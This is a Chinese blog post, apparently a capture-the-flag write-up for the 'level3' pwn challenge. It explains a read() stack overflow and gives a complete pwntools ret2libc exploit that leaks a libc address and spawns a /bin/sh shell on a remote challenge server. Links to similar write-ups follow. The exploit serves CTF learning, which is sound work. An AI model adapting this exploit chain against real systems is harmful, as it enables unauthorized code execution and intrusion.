攻防世界-level3-Writeup

最新推荐文章于 2022-11-05 11:29:54 发布
最新推荐文章于 2022-11-05 11:29:54 发布
阅读量487 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/106147711
版权

level3

[collapse title=“展开查看详情” status=“false”]

考点:栈溢出、ROP(ret2libc)

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  write(1, "Input:\n", 7u);
  return read(0, &buf, 0x100u);	//溢出
}

打开了 NX 保护栈数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这种方法在《蒸米一步一步学ROP》中有详细讲解。
第一次执行是用于泄露 libc 地址;第二次调用 system 完成 ret2libc。

完整exp

from pwn import *
from libcSearch import *

context.log_level = ';debug';

p = remote("111.198.29.45",43333)
#p = process("./level3")
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")

write_plt = elf.plt[';write';]
write_got = elf.got[';write';]
main_addr = elf.symbols[';main';]

payload = ';a';*0x88+';a';*0x4
payload += p32(write_plt)+p32(main_addr)
payload += p32(1)+p32(write_got)+p32(4)

p.sendlineafter("Input:\n",payload)
write_leak = u32(p.recv()[:4])
log.success("write_leak:"+hex(write_leak))
libc_base = write_leak - libc.symbols[';write';]
log.success("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.symbols[';system';]
log.success("system_addr:"+hex(system_addr))

binsh_addr = libc.search("/bin/sh").next() + libc_base
log.success("binsh_addr:"+hex(binsh_addr))

payload = ';a';*0x88+';a';*0x4
payload += p32(system_addr)+p32(0xdeadbeef)
payload += p32(binsh_addr)

p.sendline(payload)

p.interactive()

[/collapse]

SkYe231_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 新手区 level3
winterze的博客
04-04 387
分享一位师傅写得,很详细,对我们小白很有帮助 https://www.cnblogs.com/cloud-tree/p/11929585.html 攻防世界 新手区 level3 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stac...
攻防世界pwn新手区题解-level3
weixin_62621015的博客
04-17 856
攻防世界pwn-level3详细题解。
攻防世界新——level3
weixin_62675330的博客
02-10 1413
攻防世界 – pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
攻防世界pwn——level3
qq_62076255的博客
11-05 606
攻防世界pwn——level3
攻防世界(pwn) level3
半岛铁盒的博客
03-23 393
先下载附件;,这个附件压缩包里面有好几层,挨着打开就好了 题目没有提供 System函数 和 bin/sh 字符串 来供我们调用; 可以突破的点只有read函数。通过覆盖返回地址,执行两次main函数。第一次泄漏write函数的地址,第二次执行system函数。 from pwn import* from LibcSearcher import* p=remote('111.200.241.244','31433') elf=ELF("1") main_addr=0x8048484 write_plt
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接...[在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
Zero-level-DFD-one-page-writeup
03-12
其中包含:- 1.零级DFD。 档案名称:-DFD_Level_0.png 2.一页写作。 文件名:-PECommerce-WriteUP.docx
D3CTF2022-官方WriteUp1
08-03
3. MySQLInject MySQLInject 是一种 SQL 注入攻击技术,攻击者可以通过注入恶意的 SQL 语句来攻击 MySQL 数据库。在本题中,使用 mybatis 框架来生成 SQL 语句,攻击者可以通过注入恶意的 SQL 语句来攻击数据库。 ...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 ...返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
攻防世界Level3
WangLal的博客
07-05 293
攻防世界PWN新手题 level3的WP 基本三步:checksec,file,执行文件 只开了NX防护,且是个32位的文件 放进IDA中查看 main函数中只调用了一个函数,vulnerable_function(),进入函数中查看 发现read函数可以制造栈溢出漏洞。 要注意,题目还给了一个库,level3的文件中没有System函数,所以只能调用库中的函数。同时,文件PIE没开代表libc中函数的编移量就是固定的,只要确认了libc的基址,然后计算出system函数的offset,就可以定位到s
攻防世界 三 (进阶篇)
sjt670994562的博客
06-09 1040
CRACKME 这一道题对OD的使用进行了一定的训练,虽然相比真真正的使用还是差很多,首先是一个注册问题的exe文件,有窗口,打开OD寻找messagebox。 尝试设置断点 然后尝试打开软件点击注册,发现到了断点,说明断成功了。然后这时候看栈口,会发现之前压进来的数据有失败的提示字面,说明我们没有到判断正误的界面找到最下面的提示字面的地址,跳转,发现函数,设置断点 再次运行,然后发现不行...
Writeup of level3(Pwn) in JarvisOJ
cossack9989的博客
02-14 1531
又拾起了被我搁在一边快一个月的Pwn……(这一个月我被Android逆向拐跑了?) 不扯了,看题。 0x00 checksec 拿到文件先查checksec,得到如下信息: root@kali:~/Desktop/Pwn/level3# checksec level3 [*] '/root/Desktop/Pwn/level3/level3' Arch: i386-32-l
XMAN misc writeup
RobinZZX的博客
08-03 1573
misc: cephalopod pcap是常见的数据报存储格式,在这个题目中我们首先用binwalk检查出pcap中含有一个png文件, 然后使用tcpxtract从pcap找那个提取出png文件,文件内容即flag easycap 直接追踪流然后将FLAG后面部分base64解密 Erik-Baleog-and-Olaf 文件名字叫stego100,提示我们使用stegsolve工...
浅谈rop-ret2libc原理以及解答-以攻防世界level3为例
pointerr的博客
08-05 527
栈溢出-rop-libc 0x01、got表和plt表与动态链接、绑定延迟(重点理解) GOT概述 1、当在程序中引用某个共享库中的符号时,编译链接阶段并不知道这个符号的具体位置,只有等到动态链接器将所需要的共享库加载进内存后,也就是在运行阶段,符号的地址才会最终确定。因此,需要有一个数据结构来保存符号的绝对地址,这就是GOT表的作用,GOT表中每项保存程序中引用其他符号的绝对地址。这样,程序就可以通过引用GOT表来获得某个符号的地址 2、在X86结构中,GOT表的前三项保留,用于保存特殊的数据结构地址,其
Xman pwn level3 writeup
qq_39596232的博客
08-26 2064
题目描述: libc!libc!这次没有system,你能帮菜鸡解决这个难题么? 分析思路: 1、拿到文件后,首先查看文件的详细信息以及相应的安全机制: tucker@ubuntu:~/pwn$ file level3 level3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked,...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1649
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
Xman pwn guess_num writeup
qq_39596232的博客
08-24 896
题目描述: 菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 分析思路: 1、首先查看一下文件详细信息: tucker@ubuntu:~/pwn$ file guess_num guess_num: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter ...
Jarvis OJ level3 writeup
PLpa的博客
07-07 271
这题是典型的ROP返回libc地址题,是一个十分经典的ROP题目。 拿到题目我们可以看到他给出了一个rar文件,我们拿这个文件到Linux中解压一下: 解压出两个文件:level3和libc-2.19.so。 我们查看一下这两个文件的保护: 可以看到,libc-2.19.so保护全部开启了(幸好不是攻击他,哈哈),而level3只开了NX保护。 我们把level3放到IDA中查看一下程序逻辑:...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值